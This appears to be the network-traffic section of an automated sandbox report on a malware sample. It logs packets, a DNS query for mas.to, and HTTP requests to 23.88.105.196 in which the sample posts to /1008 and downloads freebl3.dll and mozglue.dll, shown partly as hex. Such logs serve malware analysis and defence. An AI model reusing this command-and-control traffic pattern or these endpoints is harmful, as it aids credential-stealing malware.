Sep 27, 2021 18:33:10.149842024 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.149878979 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.232507944 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.254276991 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254339933 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254357100 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254380941 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254400015 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254421949 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254445076 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254465103 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254483938 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254504919 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254528046 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254549980 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254570007 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254592896 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254647017 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.254703999 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254745007 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.254795074 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.254859924 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254940987 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.254956961 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.254983902 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255003929 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255028009 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255029917 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.255048990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255068064 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255074978 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.255090952 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255135059 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255173922 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.255193949 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.255245924 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255270958 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255319118 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255342007 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.255371094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255388021 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.255398989 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255422115 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255443096 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255461931 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255475044 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.255521059 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255547047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255557060 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.255572081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255628109 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.255678892 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.255857944 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255884886 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255908012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255934000 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255954981 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.255979061 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256001949 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256004095 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.256025076 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256055117 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256078959 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256098032 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256098032 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.256119013 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256139040 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256160021 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256165981 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.256185055 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256206036 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256226063 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.256232023 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256256104 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256313086 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.256314993 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256366014 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256407976 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256428957 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256445885 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.256452084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256474972 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256493092 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256511927 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256526947 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.256596088 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256634951 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:10.256663084 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:10.256716967 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:17.113476992 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:17.113619089 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:17.136317968 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.136434078 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:17.136826992 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.136930943 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:17.157649040 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.157669067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.157680988 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.157731056 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.157777071 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:17.157804966 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.157851934 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:17.157879114 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:17.157887936 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.157892942 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:17.157947063 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.157949924 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:17.158000946 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:17.158063889 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.158154011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.179905891 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.179939032 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.179955006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.179970026 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.179984093 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.180000067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.180020094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.180036068 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.180186987 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.362571955 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:17.364710093 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:22.027075052 CEST	49741	80	192.168.2.6	23.88.105.196

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 18:32:52.424601078 CEST	55074	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:32:52.443528891 CEST	53	55074	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:07.412336111 CEST	54513	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:07.425153971 CEST	53	54513	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:24.084480047 CEST	64267	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:24.149379969 CEST	53	64267	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:42.253237009 CEST	49448	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:42.291203976 CEST	53	49448	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:44.223140001 CEST	60342	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:44.299690962 CEST	53	60342	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:44.969746113 CEST	61346	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:45.048495054 CEST	53	61346	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:45.487870932 CEST	51774	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:45.570615053 CEST	53	51774	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:45.902487993 CEST	56023	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:46.005815029 CEST	53	56023	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:46.214914083 CEST	58384	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:46.242233038 CEST	53	58384	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:46.593533039 CEST	60261	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:46.658246994 CEST	53	60261	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:47.338186979 CEST	56061	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:47.424873114 CEST	53	56061	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:48.001725912 CEST	58336	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:48.015306950 CEST	53	58336	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:48.616951942 CEST	53781	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:48.679975986 CEST	53	53781	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:49.496711016 CEST	54064	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:49.509562016 CEST	53	54064	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:49.921266079 CEST	52811	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:50.000016928 CEST	53	52811	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:59.833268881 CEST	55299	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:59.840692043 CEST	63745	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:33:59.867470026 CEST	53	55299	8.8.8.8	192.168.2.6
Sep 27, 2021 18:33:59.878201962 CEST	53	63745	8.8.8.8	192.168.2.6
Sep 27, 2021 18:34:03.491660118 CEST	50055	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:34:03.510817051 CEST	53	50055	8.8.8.8	192.168.2.6
Sep 27, 2021 18:34:19.840560913 CEST	61374	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:34:19.912019968 CEST	53	61374	8.8.8.8	192.168.2.6
Sep 27, 2021 18:34:34.511234045 CEST	50339	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:34:34.543468952 CEST	53	50339	8.8.8.8	192.168.2.6
Sep 27, 2021 18:34:35.694257021 CEST	63307	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:34:35.722311974 CEST	53	63307	8.8.8.8	192.168.2.6
Sep 27, 2021 18:35:07.624861002 CEST	49694	53	192.168.2.6	8.8.8.8
Sep 27, 2021 18:35:07.639327049 CEST	53	49694	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 27, 2021 18:33:07.412336111 CEST	192.168.2.6	8.8.8.8	0x81f3	Standard query (0)	mas.to	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 27, 2021 18:33:07.425153971 CEST	8.8.8.8	192.168.2.6	0x81f3	No error (0)	mas.to		88.99.75.82	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

mas.to

23.88.105.196

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49740	88.99.75.82	443	C:\Users\user\Desktop\T6zZFfRLqs.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49741	23.88.105.196	80	C:\Users\user\Desktop\T6zZFfRLqs.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 18:33:08.238046885 CEST	966	OUT	POST /1008 HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 23.88.105.196 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Sep 27, 2021 18:33:08.345690012 CEST	967	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 16:33:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 8c b1 0a 83 30 10 86 9f c6 25 48 50 8b 4b 32 d6 4e 1d 2c d4 6e 5d ae 31 5a 31 21 21 b9 ab f5 ed 2b c9 58 0e fe ef 3b f8 ef ea b2 fe 9b a6 ad ca 4e 4f 40 06 65 d1 5d ee d7 a1 bf 15 4f c9 38 7e 51 30 3e c2 91 1b 18 a3 91 71 26 58 33 41 e2 0b d4 4a 3e a9 72 a3 4e e2 21 c6 cd 85 31 2d 40 f8 4e 32 3b 37 9b 5c 20 54 89 8f e1 9c 2f c3 ee f3 db 55 ef 07 65 5b 49 0c a4 a5 75 9f 45 47 61 29 2e 4a 58 7f 92 3f 78 84 d6 b9 ba 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 99e0%HPK2N,n]1Z1!!+X;NO@e]O8~Q0>q&X3AJ>rN!1-@N2;7\ T/Ue[IuEGa).JX?x0
Sep 27, 2021 18:33:08.349280119 CEST	967	OUT	GET /freebl3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 23.88.105.196 Connection: Keep-Alive
Sep 27, 2021 18:33:08.370640993 CEST	969	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 16:33:08 GMT Content-Type: application/x-msdos-program Content-Length: 334288 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "519d0-57aa1f0b0df80" Expires: Tue, 28 Sep 2021 16:33:08 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
Sep 27, 2021 18:33:08.370665073 CEST	970	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 3f 01 00 00 e8 23 c9 03 00 59 85 c0 75 0e 68 13 e0 ff ff e8 Data Ascii: h?#Yuh&Y3(UVt-jujuuuVzt(Y3^]U0SVW}EuGE9Esho}Y
Sep 27, 2021 18:33:08.370692968 CEST	971	IN	Data Raw: 41 ff 88 42 03 84 c9 75 1c 8a 4a 02 8d 41 ff 88 42 02 84 c9 75 0f 8a 4a 01 8d 41 ff 88 42 01 84 c9 75 02 fe 0a 5d c3 68 90 00 00 00 e8 ff c3 03 00 59 c3 55 8b ec 56 68 90 00 00 00 e8 ef c3 03 00 8b f0 59 85 f6 74 2a 6a 00 ff 75 18 ff 75 14 ff 75 Data Ascii: ABuJABuJABu]hYUVhYt*juuuuuVtjVWYY3^]US]3t9thY)9]shESuuPuM[]U}t!hjuO}tuHY]U
Sep 27, 2021 18:33:08.370757103 CEST	973	IN	Data Raw: 3c 73 8b 75 08 66 8b 5d f4 66 89 7d ec 66 c1 cf 05 66 2b 0c 46 66 2b 1c 56 8b 45 ec 83 e0 3f 66 89 4d f8 8b 55 f8 66 89 4d 12 66 8b 4d f0 66 2b 0c 46 66 89 4d f0 8b 75 f0 66 89 4d fe 66 89 5d f4 8b 4d f4 8b c1 f7 d0 66 c1 cb 03 23 c6 23 ca 66 2b Data Ascii: <suf]f}ff+Ff+VE?fMUfMfMf+FfMufMf]Mf##f+Ef+f+xV#Mf+#Ef+fUff+XT]#f+}#f+f+SR#fU#ff+uf+f+SPfM#f#f+Uf+f+KNfM}f##f
Sep 27, 2021 18:33:08.370780945 CEST	974	IN	Data Raw: d1 23 fb 66 8b 4d ec 23 c2 66 c1 c9 05 66 2b c8 89 55 f0 66 2b cf 8b c3 8b 7d 08 f7 d0 23 da 66 2b 4f 0e 0f b7 f1 66 8b 4d f4 23 c6 66 c1 c9 03 66 2b c8 89 75 ec 66 2b cb 66 2b 4f 0c 0f b7 f9 89 7d f4 66 8b 4d f8 8b c2 66 c1 c9 02 f7 d0 23 c7 66 Data Ascii: #fM#ff+Uf+}#f+OfM#ff+uf+f+O}fMf#f+#Uf+#f+JfM#ff+]f+f+J#fM#ff+UEf+f+HfM#f#f+}f+]f+KfM#ff+u#ff+f+K
Sep 27, 2021 18:33:08.370839119 CEST	975	IN	Data Raw: 55 f8 8b ca f7 d1 8b c2 23 4d fc 23 45 10 03 c8 8b 45 08 66 03 48 28 8b c2 66 03 ce 66 d1 c1 0f b7 f1 23 c6 89 75 f4 8b ce f7 d1 23 4d 10 03 c8 8b 45 08 66 03 48 2a 66 03 cf 66 c1 c1 02 0f b7 f9 8b cf 89 7d fc f7 d1 8b c7 23 ca 23 c6 03 c8 8b 45 Data Ascii: U#M#EEfH(ff#u#MEfH*ff}##EfH,f]fU##fK.fMfu##fK0fMf}##fK2fMfU##fK4fMfu##fK6fMf
Sep 27, 2021 18:33:08.370867968 CEST	977	IN	Data Raw: c1 02 0f b7 d1 8b ca 89 55 fc f7 d1 8b c2 23 ce 23 c7 03 c8 66 03 4b 7c 66 03 4d 10 66 c1 c1 03 0f b7 c1 8b c8 89 45 10 f7 d1 23 c2 23 cf 03 c8 66 03 4b 7e 66 03 ce 66 c1 c1 05 0f b7 c1 8b 4d 0c 89 45 f8 66 8b c7 5f 5e 66 89 01 66 8b c2 66 89 41 Data Ascii: U##fK\|fMfE##fK~ffMEf_^fffAfEfAfEfA[]UQQVuEMSW}XW+NUFfDfEfBfEffEfBfE1E1EEPPQ:MEUEfE
Sep 27, 2021 18:33:08.370894909 CEST	978	IN	Data Raw: 53 8b 5d 10 89 95 f4 fe ff ff 57 8b 7d 08 89 bd f8 fe ff ff 85 db 0f 84 a1 00 00 00 b8 00 01 00 00 3b d8 0f 83 94 00 00 00 85 ff 75 0a 68 05 e0 ff ff e9 8b 00 00 00 56 be 60 f2 03 10 6a 40 59 f3 a5 8d b5 fc fe ff ff 8b f8 3b d8 73 19 53 52 56 e8 Data Ascii: S]W};uhV`j@Y;sSRV+;wWRV2+8Guf3^hYYM_3[]USVuW}
Sep 27, 2021 18:33:08.370958090 CEST	980	IN	Data Raw: 0f b6 04 08 c1 e0 10 0b f0 8a 45 ff fe c7 0f b6 d7 8a 1c 0a 02 c3 88 45 ff 0f b6 c0 8a 0c 08 88 0c 3a 8b d7 8b 7d 1c 02 cb 83 ef 04 89 7d 1c 88 1c 10 0f b6 c1 8b 4d 14 0f b6 04 10 c1 e0 18 0b c6 8b f2 33 45 0c 8b 55 f8 89 01 83 c1 04 83 6d 18 01 Data Ascii: EE:}}M3EUmM}mE3_^[]Ujjj@u]Uhju"}tuY]UVuW}j@X;G}9r}FP
Sep 27, 2021 18:33:08.370985985 CEST	981	IN	Data Raw: 51 81 f7 d1 82 e6 ad 03 c6 89 85 cc fe ff ff 13 cf 33 85 1c ff ff ff 8b d9 89 8d c8 fe ff ff 33 9d 20 ff ff ff 8b d0 8b 4d 84 0f ac da 18 0f ac c3 18 8b 45 88 03 ca 13 c3 01 8d e0 fe ff ff 8b 8d f0 fe ff ff 13 c8 8b 85 e0 fe ff ff 33 c6 89 8d f0 Data Ascii: Q33 ME33x\|33EM$(3D3
Sep 27, 2021 18:33:08.392576933 CEST	982	IN	Data Raw: bd 80 fe ff ff 8b c8 0f ac d1 1f 0f ac c2 1f 8b 45 e0 89 8d 70 fe ff ff 8b 4d dc 03 cb 89 95 8c fe ff ff 8b 95 f4 fe ff ff 13 c7 03 d1 8b 8d d4 fe ff ff 8b f2 13 c8 89 95 f4 fe ff ff 33 b5 88 fe ff ff 8b d1 33 95 98 fe ff ff 8b 85 c8 fe ff ff 89 Data Ascii: EpM333M3E33M33
Sep 27, 2021 18:33:08.642503977 CEST	1319	OUT	GET /mozglue.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 23.88.105.196 Connection: Keep-Alive
